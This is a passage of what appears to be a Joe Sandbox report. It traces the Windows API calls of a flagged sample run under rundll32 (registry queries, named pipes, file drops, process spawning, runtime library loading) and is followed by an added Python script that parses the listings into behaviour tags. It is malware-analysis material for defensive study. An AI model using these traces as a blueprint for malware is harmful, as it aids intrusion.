                                          • StrTrimA.SHLWAPI(00000000,0489928C,?,052495B0), ref: 04895B9A
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
                                            • Part of subcall function 04893970: lstrlen.KERNEL32(?), ref: 04893988
                                            • Part of subcall function 04893970: lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
                                            • Part of subcall function 04893970: lstrcat.KERNEL32(00000000,?), ref: 048939A7
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04895BBB
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04895BC3
                                          • lstrcat.KERNEL32(00000000,?), ref: 04895BD1
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04895BD7
                                            • Part of subcall function 04894208: lstrlen.KERNEL32(?,00000000,05249DA0,00000000,04892263,05249FC3,69B25F44,?,?,?,?,69B25F44,00000005,0489A00C,4D283A53,?), ref: 0489420F
                                            • Part of subcall function 04894208: mbstowcs.NTDLL ref: 04894238
                                            • Part of subcall function 04894208: memset.NTDLL ref: 0489424A
                                          • wcstombs.NTDLL ref: 04895C68
                                            • Part of subcall function 04893394: SysAllocString.OLEAUT32(?), ref: 048933CF
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 04895CA9
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04895CB5
                                          • HeapFree.KERNEL32(00000000,00000000,?,052495B0), ref: 04895CC1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04895CCD
                                          • HeapFree.KERNEL32(00000000,?), ref: 04895CD9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlenwsprintf$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 2543559236-0
                                          • Opcode ID: cc5fd97868907c81e74bde6966637694d16d91dbcb5c75fe30b949ca605f355f
                                          • Instruction ID: f4ece27fa88d5d4000d4bc8324a0a0094575d7bc98dae11ab4751ecba365cb66
                                          • Opcode Fuzzy Hash: cc5fd97868907c81e74bde6966637694d16d91dbcb5c75fe30b949ca605f355f
                                          • Instruction Fuzzy Hash: 97913871600A09FFDF16AFA8DC88A9A3BF9EB48314B184914F805D7220DB79ED51DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32 ref: 00B626D1
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B626ED
                                          • GetLastError.KERNEL32 ref: 00B6273C
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B62752
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B62766
                                          • GetLastError.KERNEL32 ref: 00B62780
                                          • GetLastError.KERNEL32 ref: 00B627B3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B627D1
                                          • lstrlenW.KERNEL32(00000000,?), ref: 00B627FD
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B62812
                                          • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 00B628E6
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B628F5
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B6290A
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B6291D
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6292F
                                          • RtlExitUserThread.NTDLL(?,?), ref: 00B62944
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                          • String ID:
                                          • API String ID: 3853681310-3916222277
                                          • Opcode ID: fb79d9260e8a4636a966ae56ffd8054596bce2fc13d793bd13da1e7ac7c5a985
                                          • Instruction ID: 469a147c15595fa38a48f410b198676b84d75ab6d3605b3d9b0ef3fe5a56b16b
                                          • Opcode Fuzzy Hash: fb79d9260e8a4636a966ae56ffd8054596bce2fc13d793bd13da1e7ac7c5a985
                                          • Instruction Fuzzy Hash: FE813C7190020AEFEB109FA4DC88EBE7BF8EB49315F0144A9F609E7260DB755D85DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B6749E
                                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 00B674BC
                                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 00B674E8
                                          • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,?), ref: 00B67556
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B675CE
                                          • wsprintfA.USER32 ref: 00B675EA
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B675F5
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6760C
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B67698
                                          • wsprintfA.USER32 ref: 00B676B3
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B676BE
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B676D5
                                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,?,00000000,?,?,?), ref: 00B676F7
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B67712
                                          • wsprintfA.USER32 ref: 00B67729
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B67734
                                            • Part of subcall function 00B53622: lstrlen.KERNEL32(00B5D8E9,00000000,?,?,?,?,00B5D8E9,00000035,00000000,?,00000000), ref: 00B53652
                                            • Part of subcall function 00B53622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B53668
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00B5D8E9,00000000,?,?,00B5D8E9,00000035,00000000), ref: 00B5369E
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00000000,00000035,?,?,00B5D8E9,00000035), ref: 00B536B9
                                            • Part of subcall function 00B53622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B536D7
                                            • Part of subcall function 00B53622: GetLastError.KERNEL32(?,?,00B5D8E9,00000035), ref: 00B536E1
                                            • Part of subcall function 00B53622: HeapFree.KERNEL32(00000000,00000000,?,?,00B5D8E9,00000035), ref: 00B53704
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6774B
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B67777
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                          • String ID:
                                          • API String ID: 3130754786-0
                                          • Opcode ID: 2bc570751f99c920adcceb9a6e51bf555ed3244e8c0553393d5c9e25f107f487
                                          • Instruction ID: 540b8f13e98245a0f42f9cc65a0581eae6c41cf33711bba850759e0a0ce28962
                                          • Opcode Fuzzy Hash: 2bc570751f99c920adcceb9a6e51bf555ed3244e8c0553393d5c9e25f107f487
                                          • Instruction Fuzzy Hash: 9DA18D71944109FFEF109FA8DC88DAEBBB9FB44309B1144A9F60AA3260DF355D84DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 00B5DAED
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                            • Part of subcall function 00B55A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B55B6A
                                            • Part of subcall function 00B55A14: RtlEnterCriticalSection.NTDLL(?), ref: 00B55BA0
                                            • Part of subcall function 00B55A14: RtlLeaveCriticalSection.NTDLL(?), ref: 00B55BBC
                                            • Part of subcall function 00B55A14: FindNextFileW.KERNEL32(?,00000000), ref: 00B55BD5
                                            • Part of subcall function 00B55A14: WaitForSingleObject.KERNEL32(00000000), ref: 00B55BE7
                                            • Part of subcall function 00B55A14: FindClose.KERNEL32(?), ref: 00B55BFC
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55C10
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55C32
                                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 00B5DB49
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 00B5DB5C
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B5DB73
                                            • Part of subcall function 00B55A14: FindNextFileW.KERNEL32(?,00000000), ref: 00B55CA8
                                            • Part of subcall function 00B55A14: WaitForSingleObject.KERNEL32(00000000), ref: 00B55CBA
                                            • Part of subcall function 00B55A14: FindClose.KERNEL32(?), ref: 00B55CD5
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 00B5DB9E
                                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00B5DBB6
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5DC10
                                          • lstrlenW.KERNEL32(00000000,?), ref: 00B5DC33
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5DC45
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 00B5DCB9
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5DCC9
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 00B5DCF2
                                          • lstrlenW.KERNEL32(00B7A878,?), ref: 00B5DD6C
                                          • DeleteFileW.KERNEL32(?,?), ref: 00B5DD9A
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5DDA8
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5DDC9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                          • String ID:
                                          • API String ID: 72361108-0
                                          • Opcode ID: f944f4f3957d8b75f8066f5117a15e49456514ce77938addb49dc8f2b8b420ce
                                          • Instruction ID: 2a3123735708f9f85a15a6799bf4dadf266ee9cb0bed622ac6333cabd1786b3e
                                          • Opcode Fuzzy Hash: f944f4f3957d8b75f8066f5117a15e49456514ce77938addb49dc8f2b8b420ce
                                          • Instruction Fuzzy Hash: 29913971500219BFDB20DFA4DC88EAA7BFCEF49352B0544A5FA0DD7261DB309989CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B5B554
                                          • StrChrA.SHLWAPI(?,0000000D), ref: 00B5B59A
                                          • StrChrA.SHLWAPI(?,0000000A), ref: 00B5B5A7
                                          • StrChrA.SHLWAPI(?,0000007C), ref: 00B5B5CE
                                          • StrTrimA.SHLWAPI(?,00B74FC4), ref: 00B5B5E3
                                          • StrChrA.SHLWAPI(?,0000003D), ref: 00B5B5EC
                                          • StrTrimA.SHLWAPI(00000001,00B74FC4), ref: 00B5B602
                                          • _strupr.NTDLL ref: 00B5B609
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B5B616
                                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00B5B65E
                                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 00B5B67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                          • String ID: $;
                                          • API String ID: 4019332941-73438061
                                          • Opcode ID: 567784005dc0fb7fafdf15e487706765c4543a9015dc3ab2489a21ebb2431b18
                                          • Instruction ID: 23e1aeba2308e38fbd02baa52ae5d821be6fa9fdd6f4007c14e8d571c86c62a0
                                          • Opcode Fuzzy Hash: 567784005dc0fb7fafdf15e487706765c4543a9015dc3ab2489a21ebb2431b18
                                          • Instruction Fuzzy Hash: 0541B271548306AFD721AF688C45F1BBBE8EF54302F0408DDF9999B291DF74D9098B62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B5B97D
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
                                          • wcstombs.NTDLL ref: 00B5B9C0
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
                                          • TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA47
                                          • GetLastError.KERNEL32 ref: 00B5BA4B
                                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B5BA6B
                                          • CloseHandle.KERNEL32(?), ref: 00B5BA7A
                                          • CloseHandle.KERNEL32(?), ref: 00B5BA7F
                                          • GetLastError.KERNEL32 ref: 00B5BA83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                          • String ID: D
                                          • API String ID: 2463014471-2746444292
                                          • Opcode ID: bbb1caf52f5ab0e2a691b73851b11595b4bc850582dffdf9ff622c4f0cb3b610
                                          • Instruction ID: 810b54f6b6aeef85c19d6068d7af4f15999829362a2268a97ad329268e96900d
                                          • Opcode Fuzzy Hash: bbb1caf52f5ab0e2a691b73851b11595b4bc850582dffdf9ff622c4f0cb3b610
                                          • Instruction Fuzzy Hash: E841EA71900118FFDB11EFA4CD85EAEBBBDEB08346F2040A9FA05B7151DB715E489B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B5AE99
                                          • StrTrimA.SHLWAPI(00000001,?), ref: 00B5AEB2
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B5AEBD
                                          • StrTrimA.SHLWAPI(00000001,?), ref: 00B5AED6
                                          • lstrlen.KERNEL32(?,00000001,?,?), ref: 00B5AF6E
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00B5AF90
                                          • lstrcpy.KERNEL32(00000020,?), ref: 00B5AFAF
                                          • lstrlen.KERNEL32(?), ref: 00B5AFB9
                                          • memcpy.NTDLL(?,?,?), ref: 00B5AFFA
                                          • memcpy.NTDLL(?,?,?), ref: 00B5B00D
                                          • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 00B5B031
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00B5B050
                                          • HeapFree.KERNEL32(00000000,?,00000001,?,?), ref: 00B5B076
                                          • HeapFree.KERNEL32(00000000,00000001,00000001,?,?), ref: 00B5B092
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                          • String ID:
                                          • API String ID: 3323474148-0
                                          • Opcode ID: 95035ca66af972837950b6971165caf436ac379b8ecff8cb2be10c360faed418
                                          • Instruction ID: f89ac503f5c0e790dbfbc85f859531c483e44fca14c05215f57b6dfe91145098
                                          • Opcode Fuzzy Hash: 95035ca66af972837950b6971165caf436ac379b8ecff8cb2be10c360faed418
                                          • Instruction Fuzzy Hash: 47715A72508305AFD721DF28DC85B5BBBE4EB48301F044AADF999E3260D730D988CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?), ref: 00B5CB91
                                          • lstrlen.KERNEL32(?), ref: 00B5CB98
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5CBAF
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B5CBC0
                                          • lstrcat.KERNEL32(?,?), ref: 00B5CBDC
                                          • lstrcat.KERNEL32(?,?), ref: 00B5CBED
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5CBFE
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5CC9B
                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00B5CCD4
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00B5CCED
                                          • CloseHandle.KERNEL32(00000000), ref: 00B5CCF7
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5CD07
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5CD20
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5CD30
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                          • String ID:
                                          • API String ID: 333890978-0
                                          • Opcode ID: ce13cb863f872aeefe757a5082053cf953ca42c6b4db2cc1275380fe12e96e26
                                          • Instruction ID: aae74c7bd06c538dc705dca4d78120d5703ad2c47a3117dc981bcc99f7db48b8
                                          • Opcode Fuzzy Hash: ce13cb863f872aeefe757a5082053cf953ca42c6b4db2cc1275380fe12e96e26
                                          • Instruction Fuzzy Hash: 04515F76400109BFDB019FA8DC84DAE7BBDEF49355B0544A6FA09D7120DB319E85CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • wsprintfA.USER32 ref: 00B57651
                                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 00B57664
                                          • CloseHandle.KERNEL32(00000000), ref: 00B5777C
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B57687
                                          • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 00B57706
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B5771B
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B57733
                                          • GetLastError.KERNEL32(00B6BC40,?,?,?,?,?,?,?,00000040), ref: 00B5774B
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B57757
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B57766
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                          • String ID: 0x%08X$W
                                          • API String ID: 1559661116-2600449260
                                          • Opcode ID: c1f193f3cff2bf7e14ebe9d8adca9aa04a318810c5a0a414c7422fba417bbb61
                                          • Instruction ID: fe33c443d83558624efe2d2e8953067ccae04270dd1382d1cad2c189278d9db7
                                          • Opcode Fuzzy Hash: c1f193f3cff2bf7e14ebe9d8adca9aa04a318810c5a0a414c7422fba417bbb61
                                          • Instruction Fuzzy Hash: 474180B1900209EFDB10DFA4D885A9EBBF8FF08345F1085A9F959D7290DB749A54CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%
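The per-function listings in this section (the "APIs" bullets with module, arguments and ref address, followed by the dump source, fuzzy hash and uniqueness score) are easier to hunt over once they are structured. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses that listing format into records, decodes the dwCreationFlags value that CreateProcessA receives (0C000000 in the listing, using Win32 SDK constant values), and attaches coarse behaviour tags. The sample text is excerpted from two listings on this page (the CreateProcessA/TerminateProcess function and the LoadLibraryW/GetProcAddress function, with some bullets omitted for length); the tag names and API-to-tag rules are this example's own heuristics, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple, Union

# Excerpted from two function listings on this page (bullets shortened).
SAMPLE = """\
APIs
• memset.NTDLL ref: 00B5B97D
  • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
  • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
• lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
• wcstombs.NTDLL ref: 00B5B9C0
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
• TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
• GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B5BA6B
• CloseHandle.KERNEL32(?), ref: 00B5BA7A
Strings
Memory Dump Source
• Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
Similarity
• API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
• Instruction Fuzzy Hash: E841EA71900118FFDB11EFA4CD85EAEBBBDEB08346F2040A9FA05B7151DB715E489B61
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,00000000,?,?,?,00B5CE9C,?,?), ref: 00B60F1E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F8F
• LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,00B5CE9C,?,?), ref: 00B60F92
• GetProcAddress.KERNEL32(00000000,?), ref: 00B60FBB
• GetProcAddress.KERNEL32(00000000,?), ref: 00B60FD5
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00B5CE9C,?,?), ref: 00B61056
Memory Dump Source
• Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
Similarity
• Instruction Fuzzy Hash: C73108B150420BAFEB109F68DC84E677BECEF04345B054866E909D7661DF3AED94CBA0
Uniqueness Score: -1.00%
"""

# One API bullet: optional subcall prefix, Name.MODULE, optional (args), ref address.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref: (?P<ref>[0-9A-F]{8})$"
)

# CreateProcess dwCreationFlags bits (values from the Win32 SDK headers).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}

# Heuristic tags of this example (not Joe Sandbox signatures): tag -> APIs that must all appear.
TAGS = {
    "child_process_with_timeout": {"CreateProcessA", "WaitForMultipleObjects", "TerminateProcess"},
    "runtime_import_resolution": {"LoadLibraryW", "GetProcAddress"},
    "named_pipe_ipc": {"CallNamedPipeA"},
    "file_drop": {"CreateFileA", "WriteFile"},
}

Arg = Union[int, str]  # hex argument decoded to int; '?' or other literals kept as text


@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[Arg, ...]
    ref: int
    subcall_of: Optional[int] = None  # address of the subcall function, if any


@dataclass
class Function:
    calls: List[ApiCall] = field(default_factory=list)
    source: str = ""
    fuzzy_hash: str = ""
    api_id: str = ""
    uniqueness: Optional[float] = None

    def direct(self) -> List[ApiCall]:
        """Calls made by this function itself, excluding 'Part of subcall' lines."""
        return [c for c in self.calls if c.subcall_of is None]


def _arg(tok: str) -> Arg:
    try:
        return int(tok, 16)  # handles '0C000000' and negatives such as '-00000007'
    except ValueError:
        return tok  # '?' (unknown) or a literal like '='


def parse(text: str) -> List[Function]:
    funcs: List[Function] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):
            line = line[1:].strip()
        if line == "APIs":  # every listing starts with this heading
            funcs.append(Function())
            continue
        if not funcs or not line:
            continue
        fn = funcs[-1]
        m = API_RE.match(line)
        if m:
            args = tuple(_arg(t) for t in m["args"].split(",")) if m["args"] else ()
            sub = int(m["sub"], 16) if m["sub"] else None
            fn.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), sub))
        elif line.startswith("Source File: "):
            fn.source = line[len("Source File: "):].split(",")[0]
        elif line.startswith("Instruction Fuzzy Hash: "):
            fn.fuzzy_hash = line.split(": ", 1)[1]
        elif line.startswith("API ID: "):
            fn.api_id = line.split(": ", 1)[1]
        elif line.startswith("Uniqueness Score: "):
            fn.uniqueness = float(line.split(": ", 1)[1].rstrip("%"))
    return funcs


def behaviour_tags(fn: Function) -> List[str]:
    names = {c.name for c in fn.direct()}
    return sorted(tag for tag, need in TAGS.items() if need <= names)


def creation_flags(fn: Function) -> List[str]:
    """Decode the dwCreationFlags argument (index 5) of a CreateProcessA/W call, if present."""
    for c in fn.direct():
        if c.name in ("CreateProcessA", "CreateProcessW") and len(c.args) > 5 and isinstance(c.args[5], int):
            return [n for bit, n in sorted(CREATION_FLAGS.items()) if c.args[5] & bit]
    return []


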